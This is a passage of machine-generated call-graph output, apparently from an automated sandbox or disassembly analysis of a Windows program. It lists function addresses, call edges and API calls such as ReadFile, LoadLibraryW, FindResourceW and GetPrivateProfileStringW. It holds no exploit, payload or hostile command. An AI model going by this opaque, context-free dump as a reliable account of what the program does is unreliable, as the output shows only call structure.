41ee78 37743->37745 37800 41bf99 86 API calls 37744->37800 37745->37732 37748 41be6f 37747->37748 37749 41be5f 37747->37749 37754 41be8c 37748->37754 37779 418c63 memset memset 37748->37779 37778 4446ce 11 API calls 37749->37778 37751 41be69 37751->37732 37751->37742 37754->37751 37755 41bf3a 37754->37755 37757 41bed1 37754->37757 37759 41bee7 37754->37759 37782 4446ce 11 API calls 37755->37782 37758 41bef0 37757->37758 37761 41bee2 37757->37761 37758->37759 37760 41bf01 37758->37760 37759->37751 37783 41a453 86 API calls 37759->37783 37762 41bf24 memset 37760->37762 37764 41bf14 37760->37764 37780 418a6d memset memcpy memset 37760->37780 37768 41ac13 37761->37768 37762->37751 37781 41a223 memset memcpy memset 37764->37781 37767 41bf20 37767->37762 37769 41ac52 37768->37769 37770 41ac3f memset 37768->37770 37772 41ac6a 37769->37772 37784 41dc14 19 API calls 37769->37784 37775 41acd9 37770->37775 37773 41aca1 37772->37773 37785 41519d 37772->37785 37773->37775 37776 41acc0 memset 37773->37776 37777 41accd memcpy 37773->37777 37775->37759 37776->37775 37777->37775 37778->37751 37779->37754 37780->37764 37781->37767 37782->37759 37784->37772 37788 4175ed 37785->37788 37796 417570 SetFilePointer 37788->37796 37791 41760a ReadFile 37792 417637 37791->37792 37793 417627 GetLastError 37791->37793 37794 4151b3 37792->37794 37795 41763e memset 37792->37795 37793->37794 37794->37773 37795->37794 37797 41759c GetLastError 37796->37797 37799 4175b2 37796->37799 37798 4175a8 GetLastError 37797->37798 37797->37799 37798->37799 37799->37791 37799->37794 37800->37745 37801 417bc5 37802 417c61 37801->37802 37803 417bda 37801->37803 37803->37802 37804 417bf6 UnmapViewOfFile CloseHandle 37803->37804 37806 417c2c 37803->37806 37808 4175b7 37803->37808 37804->37803 37804->37804 37806->37803 37813 41851e 20 API calls 37806->37813 37809 4175d6 CloseHandle 37808->37809 37810 4175c8 37809->37810 37811 4175df 37809->37811 37810->37811 37812 4175ce Sleep 37810->37812 37811->37803 37812->37809 37813->37806 37814 4152c7 malloc 37815 4152ef 37814->37815 37817 4152e2 37814->37817 37818 416760 11 API calls 37815->37818 37818->37817 37819 4148b6 FindResourceW 37820 4148cf SizeofResource 37819->37820 37823 4148f9 37819->37823 37821 4148e0 LoadResource 37820->37821 37820->37823 37822 4148ee LockResource 37821->37822 37821->37823 37822->37823 37824 415308 free 37825 441b3f 37835 43a9f6 37825->37835 37827 441b61 38008 4386af memset 37827->38008 37829 44189a 37830 442bd4 37829->37830 37831 4418e2 37829->37831 37832 4418ea 37830->37832 38010 441409 memset 37830->38010 37831->37832 38009 4414a9 12 API calls 37831->38009 37836 43aa20 37835->37836 37837 43aadf 37835->37837 37836->37837 37838 43aa34 memset 37836->37838 37837->37827 37839 43aa56 37838->37839 37840 43aa4d 37838->37840 38011 43a6e7 37839->38011 38019 42c02e memset 37840->38019 37845 43aad3 38021 4169a7 11 API calls 37845->38021 37846 43aaae 37846->37837 37846->37845 37861 43aae5 37846->37861 37848 43ac18 37850 43ac47 37848->37850 38023 42bbd5 memcpy memcpy memcpy memset memcpy 37848->38023 37851 43aca8 37850->37851 38024 438eed 16 API calls 37850->38024 37855 43acd5 37851->37855 38026 4233ae 11 API calls 37851->38026 37854 43ac87 38025 4233c5 16 API calls 37854->38025 38027 423426 11 API calls 37855->38027 37859 43ace1 38028 439811 163 API calls 37859->38028 37860 43a9f6 161 API calls 37860->37861 37861->37837 37861->37848 37861->37860 38022 439bbb 22 API calls 37861->38022 37863 43acfd 37869 43ad2c 37863->37869 38029 438eed 16 API calls 37863->38029 37865 43ad19 38030 4233c5 16 API calls 37865->38030 37867 43ad58 38031 44081d 163 API calls 37867->38031 37869->37867 37871 43add9 37869->37871 37871->37871 38035 423426 11 API calls 37871->38035 37872 43ae3a memset 37873 43ae73 37872->37873 38036 42e1c0 147 API calls 37873->38036 37874 43adab 38033 438c4e 163 API calls 37874->38033 37876 43ad6c 37876->37837 37876->37874 38032 42370b memset memcpy memset 37876->38032 37878 43ae96 38037 42e1c0 147 API calls 37878->38037 37880 43adcc 38034 440f84 12 API calls 37880->38034 37883 43aea8 37884 43aec1 37883->37884 38038 42e199 147 API calls 37883->38038 37886 43af00 37884->37886 38039 42e1c0 147 API calls 37884->38039 37886->37837 37889 43af1a 37886->37889 37890 43b3d9 37886->37890 38040 438eed 16 API calls 37889->38040 37895 43b3f6 37890->37895 37902 43b4c8 37890->37902 37892 43b60f 37892->37837 38099 4393a5 17 API calls 37892->38099 37893 43af2f 38041 4233c5 16 API calls 37893->38041 38081 432878 12 API calls 37895->38081 37897 43af51 38042 423426 11 API calls 37897->38042 37900 43af7d 38043 423426 11 API calls 37900->38043 37901 43b4f2 38088 43a76c 21 API calls 37901->38088 37902->37901 38087 42bbd5 memcpy memcpy memcpy memset memcpy 37902->38087 37906 43b529 38089 44081d 163 API calls 37906->38089 37907 43b428 37935 43b462 37907->37935 38082 432b60 16 API calls 37907->38082 37908 43af94 38044 423330 11 API calls 37908->38044 37912 43b47e 37915 43b497 37912->37915 38084 42374a memcpy memset memcpy memcpy memcpy 37912->38084 37913 43b544 37923 43b55c 37913->37923 38090 42c02e memset 37913->38090 37914 43afca 38045 423330 11 API calls 37914->38045 38085 4233ae 11 API calls 37915->38085 37920 43afdb 38046 4233ae 11 API calls 37920->38046 37922 43b4b1 38086 423399 11 API calls 37922->38086 38091 43a87a 163 API calls 37923->38091 37925 43b56c 37928 43b58a 37925->37928 38092 423330 11 API calls 37925->38092 37927 43afee 38047 44081d 163 API calls 37927->38047 38093 440f84 12 API calls 37928->38093 37930 43b4c1 38095 42db80 163 API calls 37930->38095 37934 43b592 38094 43a82f 16 API calls 37934->38094 38083 423330 11 API calls 37935->38083 37938 43b5b4 38096 438c4e 163 API calls 37938->38096 37940 43b5cf 38097 42c02e memset 37940->38097 37942 43b005 37942->37837 37947 43b01f 37942->37947 38048 42d836 163 API calls 37942->38048 37943 43b1ef 38058 4233c5 16 API calls 37943->38058 37945 43b212 38059 423330 11 API calls 37945->38059 37947->37943 38056 423330 11 API calls 37947->38056 38057 42d71d 163 API calls 37947->38057 37949 43add4 37949->37892 38098 438f86 16 API calls 37949->38098 37952 43b087 38049 4233ae 11 API calls 37952->38049 37953 43b22a 38060 42ccb5 11 API calls 37953->38060 37956 43b10f 38052 423330 11 API calls 37956->38052 37957 43b23f 38061 4233ae 11 API calls 37957->38061 37959 43b257 38062 4233ae 11 API calls 37959->38062 37963 43b129 38053 4233ae 11 API calls 37963->38053 37964 43b26e 38063 4233ae 11 API calls 37964->38063 37966 43b09a 37966->37956 38050 42cc15 19 API calls 37966->38050 38051 4233ae 11 API calls 37966->38051 37968 43b282 38064 43a87a 163 API calls 37968->38064 37970 43b13c 38054 440f84 12 API calls 37970->38054 37972 43b29d 38065 423330 11 API calls 37972->38065 37975 43b15f 38055 4233ae 11 API calls 37975->38055 37976 43b2af 37978 43b2b8 37976->37978 37979 43b2ce 37976->37979 38066 4233ae 11 API calls 37978->38066 38067 440f84 12 API calls 37979->38067 37982 43b2c9 38069 4233ae 11 API calls 37982->38069 37983 43b2da 38068 42370b memset memcpy memset 37983->38068 37986 43b2f9 38070 423330 11 API calls 37986->38070 37988 43b30b 38071 423330 11 API calls 37988->38071 37990 43b325 38072 423399 11 API calls 37990->38072 37992 43b332 38073 4233ae 11 API calls 37992->38073 37994 43b354 38074 423399 11 API calls 37994->38074 37996 43b364 38075 43a82f 16 API calls 37996->38075 37998 43b370 38076 42db80 163 API calls 37998->38076 38000 43b380 38077 438c4e 163 API calls 38000->38077 38002 43b39e 38078 423399 11 API calls 38002->38078 38004 43b3ae 38079 43a76c 21 API calls 38004->38079 38006 43b3c3 38080 423399 11 API calls 38006->38080 38008->37829 38009->37832 38010->37830 38012 43a6f5 38011->38012 38018 43a765 38011->38018 38012->38018 38100 42a115 38012->38100 38016 43a73d 38017 42a115 147 API calls 38016->38017 38016->38018 38017->38018 38018->37837 38020 4397fd memset 38018->38020 38019->37839 38020->37846 38021->37837 38022->37861 38023->37850 38024->37854 38025->37851 38026->37855 38027->37859 38028->37863 38029->37865 38030->37869 38031->37876 38032->37874 38033->37880 38034->37949 38035->37872 38036->37878 38037->37883 38038->37884 38039->37884 38040->37893 38041->37897 38042->37900 38043->37908 38044->37914 38045->37920 38046->37927 38047->37942 38048->37952 38049->37966 38050->37966 38051->37966 38052->37963 38053->37970 38054->37975 38055->37947 38056->37947 38057->37947 38058->37945 38059->37953 38060->37957 38061->37959 38062->37964 38063->37968 38064->37972 38065->37976 38066->37982 38067->37983 38068->37982 38069->37986 38070->37988 38071->37990 38072->37992 38073->37994 38074->37996 38075->37998 38076->38000 38077->38002 38078->38004 38079->38006 38080->37949 38081->37907 38082->37935 38083->37912 38084->37915 38085->37922 38086->37930 38087->37901 38088->37906 38089->37913 38090->37923 38091->37925 38092->37928 38093->37934 38094->37930 38095->37938 38096->37940 38097->37949 38098->37892 38099->37837 38101 42a175 38100->38101 38103 42a122 38100->38103 38101->38018 38106 42b13b 147 API calls 38101->38106 38103->38101 38104 42a115 147 API calls 38103->38104 38107 43a174 38103->38107 38131 42a0a8 147 API calls 38103->38131 38104->38103 38106->38016 38121 43a196 38107->38121 38122 43a19e 38107->38122 38108 43a306 38108->38121 38151 4388c4 14 API calls 38108->38151 38111 42a115 147 API calls 38111->38122 38113 43a642 38113->38121 38155 4169a7 11 API calls 38113->38155 38117 43a635 38154 42c02e memset 38117->38154 38121->38103 38122->38108 38122->38111 38122->38121 38132 42ff8c 38122->38132 38140 415a91 38122->38140 38144 4165ff 38122->38144 38147 439504 13 API calls 38122->38147 38148 4312d0 147 API calls 38122->38148 38149 42be4c memcpy memcpy memcpy memset memcpy 38122->38149 38150 43a121 11 API calls 38122->38150 38124 4169a7 11 API calls 38125 43a325 38124->38125 38125->38113 38125->38117 38125->38121 38125->38124 38126 42b5b5 memset memcpy 38125->38126 38127 42bf4c 14 API calls 38125->38127 38130 4165ff 11 API calls 38125->38130 38152 42b63e 14 API calls 38125->38152 38153 42bfcf memcpy 38125->38153 38126->38125 38127->38125 38130->38125 38131->38103 38156 43817e 38132->38156 38134 42ff99 38135 42ffe3 38134->38135 38136 42ffd0 38134->38136 38139 42ff9d 38134->38139 38161 4169a7 11 API calls 38135->38161 38160 4169a7 11 API calls 38136->38160 38139->38122 38141 415a9d 38140->38141 38142 415ab3 38141->38142 38143 415aa4 memset 38141->38143 38142->38122 38143->38142 38387 4165a0 38144->38387 38147->38122 38148->38122 38149->38122 38150->38122 38151->38125 38152->38125 38153->38125 38154->38113 38155->38121 38157 438187 38156->38157 38159 438192 38156->38159 38162 4380f6 38157->38162 38159->38134 38160->38139 38161->38139 38164 43811f 38162->38164 38163 438164 38163->38159 38164->38163 38167 437e5e 38164->38167 38190 4300e8 38164->38190 38198 437d3c 38167->38198 38169 437eb3 38169->38164 38170 437ea9 38170->38169 38176 437f22 38170->38176 38213 41f432 38170->38213 38173 437f06 38260 415c56 11 API calls 38173->38260 38175 437f95 38265 415c56 11 API calls 38175->38265 38177 437f7f 38176->38177 38261 432d4e 38176->38261 38177->38175 38180 43802b 38177->38180 38181 4165ff 11 API calls 38180->38181 38182 438054 38181->38182 38224 437371 38182->38224 38185 43806b 38186 438094 38185->38186 38266 42f50e 138 API calls 38185->38266 38188 437fa3 38186->38188 38189 4300e8 3 API calls 38186->38189 38188->38169 38267 41f638 104 API calls 38188->38267 38189->38188 38191 430128 38190->38191 38194 4300fa 38190->38194 38193 430196 memset 38191->38193 38195 4301bc 38193->38195 38197 4301de 38193->38197 38194->38191 38194->38197 38370 432f8c 38194->38370 38196 4301c9 memcpy 38195->38196 38195->38197 38196->38197 38197->38164 38199 437d69 38198->38199 38202 437d80 38198->38202 38280 437ccb 11 API calls 38199->38280 38201 437d76 38201->38170 38202->38201 38203 437da3 38202->38203 38205 437d90 38202->38205 38268 438460 38203->38268 38205->38201 38284 437ccb 11 API calls 38205->38284 38208 437de8 38283 424f26 123 API calls 38208->38283 38209 437dcb 38209->38208 38281 444283 13 API calls 38209->38281 38211 437dfc 38282 437ccb 11 API calls 38211->38282 38214 41f54d 38213->38214 38220 41f44f 38213->38220 38215 41f466 38214->38215 38314 41c635 memset memset 38214->38314 38215->38173 38215->38176 38220->38215 38222 41f50b 38220->38222 38285 41f1a5 38220->38285 38310 41c06f memcmp 38220->38310 38311 41f3b1 90 API calls 38220->38311 38312 41f398 86 API calls 38220->38312 38222->38214 38222->38215 38313 41c295 86 API calls 38222->38313 38315 41703f 38224->38315 38226 437399 38227 43739d 38226->38227 38230 4373ac 38226->38230 38348 4446ea 11 API calls 38227->38348 38229 4373a7 38229->38185 38322 416935 38230->38322 38232 4373ca 38234 438460 134 API calls 38232->38234 38242 415a91 memset 38232->38242 38245 43758f 38232->38245 38257 437584 38232->38257 38259 437d3c 135 API calls 38232->38259 38330 4251c4 38232->38330 38349 425433 13 API calls 38232->38349 38350 425413 17 API calls 38232->38350 38351 42533e 16 API calls 38232->38351 38352 42538f 16 API calls 38232->38352 38353 42453e 123 API calls 38232->38353 38233 4375bc 38356 415c7d 38233->38356 38234->38232 38240 4375e2 38240->38229 38367 444283 13 API calls 38240->38367 38242->38232 38354 42453e 123 API calls 38245->38354 38246 4375f4 38251 437620 38246->38251 38252 43760b 38246->38252 38250 43759f 38253 416935 16 API calls 38250->38253 38255 416935 16 API calls 38251->38255 38368 444283 13 API calls 38252->38368 38253->38257 38255->38229 38257->38233 38355 42453e 123 API calls 38257->38355 38258 437612 memcpy 38258->38229 38259->38232 38260->38169 38262 432d58 38261->38262 38264 432d65 38261->38264 38369 432cc4 memset memset memcpy 38262->38369 38264->38177 38265->38188 38266->38186 38267->38169 38269 41703f 11 API calls 38268->38269 38270 43847a 38269->38270 38271 43848a 38270->38271 38272 43847e 38270->38272 38274 438270 134 API calls 38271->38274 38273 4446ea 11 API calls 38272->38273 38279 438488 38273->38279 38275 4384aa 38274->38275 38276 424f26 123 API calls 38275->38276 38275->38279 38277 4384bb 38276->38277 38278 438270 134 API calls 38277->38278 38278->38279 38279->38209 38280->38201 38281->38211 38282->38208 38283->38201 38284->38201 38286 41bc3b 101 API calls 38285->38286 38287 41f1b4 38286->38287 38288 41edad 86 API calls 38287->38288 38295 41f282 38287->38295 38289 41f1cb 38288->38289 38290 41f1f5 memcmp 38289->38290 38291 41f20e 38289->38291 38289->38295 38290->38291 38292 41f21b memcmp 38291->38292 38291->38295 38293 41f326 38292->38293 38296 41f23d 38292->38296 38294 41ee6b 86 API calls 38293->38294 38293->38295 38294->38295 38295->38220 38296->38293 38297 41f28e memcmp 38296->38297 38299 41c8df 56 API calls 38296->38299 38297->38293 38298 41f2a9 38297->38298 38298->38293 38301 41f308 38298->38301 38302 41f2d8 38298->38302 38300 41f269 38299->38300 38300->38293 38303 41f287 38300->38303 38304 41f27a 38300->38304 38301->38293 38308 4446ce 11 API calls 38301->38308 38305 41ee6b 86 API calls 38302->38305 38303->38297 38306 41ee6b 86 API calls 38304->38306 38307 41f2e0 38305->38307 38306->38295 38309 41b1ca memset 38307->38309 38308->38293 38309->38295 38310->38220 38311->38220 38312->38220 38313->38214 38314->38215 38316 417044 38315->38316 38317 41705c 38315->38317 38319 416760 11 API calls 38316->38319 38321 417055 38316->38321 38318 417075 38317->38318 38320 41707a 11 API calls 38317->38320 38318->38226 38319->38321 38320->38316 38321->38226 38323 41693e 38322->38323 38327 41698e 38322->38327 38324 41694c 38323->38324 38325 422fd1 memset 38323->38325 38326 4165a0 11 API calls 38324->38326 38324->38327 38325->38324 38328 416972 38326->38328 38327->38232 38328->38327 38329 422b84 15 API calls 38328->38329 38329->38327 38331 424f07 11 API calls 38330->38331 38332 4251e4 38331->38332 38333 4251f7 38332->38333 38334 4251e8 38332->38334 38337 4250f8 127 API calls 38333->38337 38335 4446ea 11 API calls 38334->38335 38336 4251f2 38335->38336 38336->38232 38338 425209 38337->38338 38340 425249 38338->38340 38341 4384e9 135 API calls 38338->38341 38342 424f74 124 API calls 38338->38342 38344 4250f8 127 API calls 38338->38344 38345 425287 38338->38345 38339 415c7d 16 API calls 38339->38336 38343 424ff0 13 API calls 38340->38343 38340->38345 38341->38338 38342->38338 38346 425266 38343->38346 38344->38338 38345->38339 38346->38345 38347 415be9 memcpy 38346->38347 38347->38345 38348->38229 38349->38232 38350->38232 38351->38232 38352->38232 38353->38232 38354->38250 38355->38233 38357 415c81 38356->38357 38359 415c9c 38356->38359 38358 416935 16 API calls 38357->38358 38357->38359 38358->38359 38359->38229 38360 4442e6 38359->38360 38361 4442eb 38360->38361 38364 444303 38360->38364 38362 41707a 11 API calls 38361->38362 38363 4442f2 38362->38363 38363->38364 38365 4446ea 11 API calls 38363->38365 38364->38240 38366 444300 38365->38366 38366->38240 38367->38246 38368->38258 38369->38264 38371 432fc6 38370->38371 38373 432fdd 38371->38373 38386 43bd08 memset 38371->38386 38375 43300e 38373->38375 38376 43024d 38373->38376 38375->38194 38377 4302f9 38376->38377 38382 43025c 38376->38382 38377->38373 38378 4302cd 38379 435ef3 memset 38378->38379 38380 4302d4 38379->38380 38381 4301e7 memset 38380->38381 38384 4302dc 38381->38384 38382->38377 38382->38378 38383 4172c8 memset 38382->38383 38383->38382 38385 4386af memset 38384->38385 38385->38377 38386->38371 38392 415cfe 38387->38392 38393 41628e 38392->38393 38399 415d23 __aullrem __aulldvrm 38392->38399 38400 416520 38393->38400 38394 4163ca 38406 416422 11 API calls 38394->38406 38396 416172 memset 38396->38399 38397 416422 10 API calls 38397->38399 38398 415cb9 10 API calls 38398->38399 38399->38393 38399->38394 38399->38396 38399->38397 38399->38398 38401 416527 38400->38401 38405 416574 38400->38405 38403 416544 38401->38403 38401->38405 38407 4156aa 11 API calls 38401->38407 38404 416561 memcpy 38403->38404 38403->38405 38404->38405 38405->38122 38406->38393 38407->38403 38408 41276d 38409 41277d 38408->38409 38451 4044a4 LoadLibraryW 38409->38451 38411 412785 38412 412789 38411->38412 38459 414b81 38411->38459 38415 4127c8 38465 412465 memset ??2@YAPAXI 38415->38465 38417 4127ea 38477 40ac21 38417->38477 38422 412813 38495 40dd07 memset 38422->38495 38423 412827 38500 40db69 memset 38423->38500 38426 412822 38521 4125b6 ??3@YAXPAX 38426->38521 38428 40ada2 _wcsicmp 38430 41283d 38428->38430 38430->38426 38433 412863 CoInitialize 38430->38433 38505 41268e 38430->38505 38525 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38433->38525 38436 41296f 38527 40b633 38436->38527 38438 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38443 412957 CoUninitialize 38438->38443 38448 4128ca 38438->38448 38443->38426 38444 4128d0 TranslateAcceleratorW 38445 412941 GetMessageW 38444->38445 38444->38448 38445->38443 38445->38444 38446 412909 IsDialogMessageW 38446->38445 38446->38448 38447 4128fd IsDialogMessageW 38447->38445 38447->38446 38448->38444 38448->38446 38448->38447 38449 41292b TranslateMessage DispatchMessageW 38448->38449 38450 41291f IsDialogMessageW 38448->38450 38449->38445 38450->38445 38450->38449 38452 4044f7 38451->38452 38453 4044cf GetProcAddress 38451->38453 38457 404507 MessageBoxW 38452->38457 38458 40451e 38452->38458 38454 4044e8 FreeLibrary 38453->38454 38455 4044df 38453->38455 38454->38452 38456 4044f3 38454->38456 38455->38454 38456->38452 38457->38411 38458->38411 38460 414b8a 38459->38460 38461 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38459->38461 38531 40a804 memset 38460->38531 38461->38415 38464 414b9e GetProcAddress 38464->38461 38466 4124e0 38465->38466 38467 412505 ??2@YAPAXI 38466->38467 38468 41251c 38467->38468 38473 412521 38467->38473 38553 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38468->38553 38542 444722 38473->38542 38476 41259b wcscpy 38476->38417 38558 40b1ab free free 38477->38558 38479 40ad76 38559 40aa04 38479->38559 38482 40a9ce malloc memcpy free free 38485 40ac5c 38482->38485 38483 40ad4b 38483->38479 38582 40a9ce 38483->38582 38485->38479 38485->38482 38485->38483 38486 40ace7 free 38485->38486 38562 40a8d0 38485->38562 38574 4099f4 38485->38574 38486->38485 38490 40a8d0 7 API calls 38490->38479 38491 40ada2 38492 40adc9 38491->38492 38493 40adaa 38491->38493 38492->38422 38492->38423 38493->38492 38494 40adb3 _wcsicmp 38493->38494 38494->38492 38494->38493 38587 40dce0 38495->38587 38497 40dd3a GetModuleHandleW 38592 40dba7 38497->38592 38501 40dce0 3 API calls 38500->38501 38502 40db99 38501->38502 38664 40dae1 38502->38664 38678 402f3a 38505->38678 38507 412766 38507->38426 38507->38433 38508 4126d3 _wcsicmp 38509 4126a8 38508->38509 38509->38507 38509->38508 38511 41270a 38509->38511 38712 4125f8 7 API calls 38509->38712 38511->38507 38681 411ac5 38511->38681 38522 4125da 38521->38522 38523 4125f0 38522->38523 38524 4125e6 DeleteObject 38522->38524 38526 40b1ab free free 38523->38526 38524->38523 38525->38438 38526->38436 38528 40b640 38527->38528 38529 40b639 free 38527->38529 38530 40b1ab free free 38528->38530 38529->38528 38530->38412 38532 40a83b GetSystemDirectoryW 38531->38532 38533 40a84c wcscpy 38531->38533 38532->38533 38538 409719 wcslen 38533->38538 38536 40a881 LoadLibraryW 38537 40a886 38536->38537 38537->38461 38537->38464 38539 409724 38538->38539 38540 409739 wcscat LoadLibraryW 38538->38540 38539->38540 38541 40972c wcscat 38539->38541 38540->38536 38540->38537 38541->38540 38543 444732 38542->38543 38544 444728 DeleteObject 38542->38544 38554 409cc3 38543->38554 38544->38543 38546 412551 38547 4010f9 38546->38547 38548 401130 38547->38548 38549 401134 GetModuleHandleW LoadIconW 38548->38549 38550 401107 wcsncat 38548->38550 38551 40a7be 38549->38551 38550->38548 38552 40a7d2 38551->38552 38552->38476 38552->38552 38553->38473 38557 409bfd memset wcscpy 38554->38557 38556 409cdb CreateFontIndirectW 38556->38546 38557->38556 38558->38485 38560 40aa14 38559->38560 38561 40aa0a free 38559->38561 38560->38491 38561->38560 38563 40a8eb 38562->38563 38564 40a8df wcslen 38562->38564 38565 40a906 free 38563->38565 38566 40a90f 38563->38566 38564->38563 38567 40a919 38565->38567 38568 4099f4 3 API calls 38566->38568 38569 40a932 38567->38569 38570 40a929 free 38567->38570 38568->38567 38572 4099f4 3 API calls 38569->38572 38571 40a93e memcpy 38570->38571 38571->38485 38573 40a93d 38572->38573 38573->38571 38575 409a41 38574->38575 38576 4099fb malloc 38574->38576 38575->38485 38578 409a37 38576->38578 38579 409a1c 38576->38579 38578->38485 38580 409a30 free 38579->38580 38581 409a20 memcpy 38579->38581 38580->38578 38581->38580 38583 40a9e7 38582->38583 38584 40a9dc free 38582->38584 38585 4099f4 3 API calls 38583->38585 38586 40a9f2 38584->38586 38585->38586 38586->38490 38611 409bca GetModuleFileNameW 38587->38611 38589 40dce6 wcsrchr 38590 40dcf5 38589->38590 38591 40dcf9 wcscat 38589->38591 38590->38591 38591->38497 38612 44db70 38592->38612 38596 40dbfd 38615 4447d9 38596->38615 38599 40dc34 wcscpy wcscpy 38641 40d6f5 38599->38641 38600 40dc1f wcscpy 38600->38599 38603 40d6f5 3 API calls 38604 40dc73 38603->38604 38605 40d6f5 3 API calls 38604->38605 38606 40dc89 38605->38606 38607 40d6f5 3 API calls 38606->38607 38608 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38607->38608 38647 40da80 38608->38647 38611->38589 38613 40dbb4 memset memset 38612->38613 38614 409bca GetModuleFileNameW 38613->38614 38614->38596 38616 4447f4 38615->38616 38617 40dc1b 38616->38617 38618 444807 ??2@YAPAXI 38616->38618 38617->38599 38617->38600 38619 44481f 38618->38619 38620 444873 _snwprintf 38619->38620 38621 4448ab wcscpy 38619->38621 38654 44474a 8 API calls 38620->38654 38623 4448bb 38621->38623 38655 44474a 8 API calls 38623->38655 38624 4448a7 38624->38621 38624->38623 38626 4448cd 38656 44474a 8 API calls 38626->38656 38628 4448e2 38657 44474a 8 API calls 38628->38657 38630 4448f7 38658 44474a 8 API calls 38630->38658 38632 44490c 38659 44474a 8 API calls 38632->38659 38634 444921 38660 44474a 8 API calls 38634->38660 38636 444936 38661 44474a 8 API calls 38636->38661 38638 44494b 38662 44474a 8 API calls 38638->38662 38640 444960 ??3@YAXPAX 38640->38617 38642 44db70 38641->38642 38643 40d702 memset GetPrivateProfileStringW 38642->38643 38644 40d752 38643->38644 38645 40d75c WritePrivateProfileStringW 38643->38645 38644->38645 38646 40d758 38644->38646 38645->38646 38646->38603 38648 44db70 38647->38648 38649 40da8d memset 38648->38649 38650 40daac LoadStringW 38649->38650 38653 40dac6 38650->38653 38652 40dade 38652->38426 38653->38650 38653->38652 38663 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38653->38663 38654->38624 38655->38626 38656->38628 38657->38630 38658->38632 38659->38634 38660->38636 38661->38638 38662->38640 38663->38653 38674 409b98 GetFileAttributesW 38664->38674 38666 40daea 38667 40daef wcscpy wcscpy GetPrivateProfileIntW 38666->38667 38673 40db63 38666->38673 38675 40d65d GetPrivateProfileStringW 38667->38675 38669 40db3e 38676 40d65d GetPrivateProfileStringW 38669->38676 38671 40db4f 38677 40d65d GetPrivateProfileStringW 38671->38677 38673->38428 38674->38666 38675->38669 38676->38671 38677->38673 38713 40eaff 38678->38713 38682 411ae2 memset 38681->38682 38683 411b8f 38681->38683 38753 409bca GetModuleFileNameW 38682->38753 38695 411a8b 38683->38695 38685 411b0a wcsrchr 38686 411b22 wcscat 38685->38686 38687 411b1f 38685->38687 38754 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38686->38754 38687->38686 38689 411b67 38755 402afb 38689->38755 38693 411b7f 38811 40ea13 SendMessageW memset SendMessageW 38693->38811 38696 402afb 27 API calls 38695->38696 38697 411ac0 38696->38697 38698 4110dc 38697->38698 38699 41113e 38698->38699 38704 4110f0 38698->38704 38836 40969c LoadCursorW SetCursor 38699->38836 38701 411143 38837 4032b4 38701->38837 38855 444a54 38701->38855 38702 4110f7 _wcsicmp 38702->38704 38703 411157 38705 40ada2 _wcsicmp 38703->38705 38704->38699 38704->38702 38858 410c46 10 API calls 38704->38858 38708 411167 38705->38708 38706 4111af 38708->38706 38709 4111a6 qsort 38708->38709 38709->38706 38712->38509 38714 40eb10 38713->38714 38726 40e8e0 38714->38726 38717 40eb6c memcpy memcpy 38718 40ebb7 38717->38718 38718->38717 38719 40ebf2 ??2@YAPAXI ??2@YAPAXI 38718->38719 38721 40d134 16 API calls 38718->38721 38720 40ec65 38719->38720 38722 40ec2e ??2@YAPAXI 38719->38722 38736 40ea7f 38720->38736 38721->38718 38722->38720 38725 402f49 38725->38509 38727 40e8f2 38726->38727 38728 40e8eb ??3@YAXPAX 38726->38728 38729 40e900 38727->38729 38730 40e8f9 ??3@YAXPAX 38727->38730 38728->38727 38731 40e911 38729->38731 38732 40e90a ??3@YAXPAX 38729->38732 38730->38729 38733 40e931 ??2@YAPAXI ??2@YAPAXI 38731->38733 38734 40e921 ??3@YAXPAX 38731->38734 38735 40e92a ??3@YAXPAX 38731->38735 38732->38731 38733->38717 38734->38735 38735->38733 38737 40aa04 free 38736->38737 38738 40ea88 38737->38738 38739 40aa04 free 38738->38739 38740 40ea90 38739->38740 38741 40aa04 free 38740->38741 38742 40ea98 38741->38742 38743 40aa04 free 38742->38743 38744 40eaa0 38743->38744 38745 40a9ce 4 API calls 38744->38745 38746 40eab3 38745->38746 38747 40a9ce 4 API calls 38746->38747 38748 40eabd 38747->38748 38749 40a9ce 4 API calls 38748->38749 38750 40eac7 38749->38750 38751 40a9ce 4 API calls 38750->38751 38752 40ead1 38751->38752 38752->38725 38753->38685 38754->38689 38812 40b2cc 38755->38812 38757 402b0a 38758 40b2cc 27 API calls 38757->38758 38759 402b23 38758->38759 38760 40b2cc 27 API calls 38759->38760 38761 402b3a 38760->38761 38762 40b2cc 27 API calls 38761->38762 38763 402b54 38762->38763 38764 40b2cc 27 API calls 38763->38764 38765 402b6b 38764->38765 38766 40b2cc 27 API calls 38765->38766 38767 402b82 38766->38767 38768 40b2cc 27 API calls 38767->38768 38769 402b99 38768->38769 38770 40b2cc 27 API calls 38769->38770 38771 402bb0 38770->38771 38772 40b2cc 27 API calls 38771->38772 38773 402bc7 38772->38773 38774 40b2cc 27 API calls 38773->38774 38775 402bde 38774->38775 38776 40b2cc 27 API calls 38775->38776 38777 402bf5 38776->38777 38778 40b2cc 27 API calls 38777->38778 38779 402c0c 38778->38779 38780 40b2cc 27 API calls 38779->38780 38781 402c23 38780->38781 38782 40b2cc 27 API calls 38781->38782 38783 402c3a 38782->38783 38784 40b2cc 27 API calls 38783->38784 38785 402c51 38784->38785 38786 40b2cc 27 API calls 38785->38786 38787 402c68 38786->38787 38788 40b2cc 27 API calls 38787->38788 38789 402c7f 38788->38789 38790 40b2cc 27 API calls 38789->38790 38791 402c99 38790->38791 38792 40b2cc 27 API calls 38791->38792 38793 402cb3 38792->38793 38794 40b2cc 27 API calls 38793->38794 38795 402cd5 38794->38795 38796 40b2cc 27 API calls 38795->38796 38797 402cf0 38796->38797 38798 40b2cc 27 API calls 38797->38798 38799 402d0b 38798->38799 38800 40b2cc 27 API calls 38799->38800 38801 402d26 38800->38801 38802 40b2cc 27 API calls 38801->38802 38803 402d3e 38802->38803 38804 40b2cc 27 API calls 38803->38804 38805 402d59 38804->38805 38806 40b2cc 27 API calls 38805->38806 38807 402d78 38806->38807 38808 40b2cc 27 API calls 38807->38808 38809 402d93 38808->38809 38810 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38809->38810 38810->38693 38811->38683 38815 40b58d 38812->38815 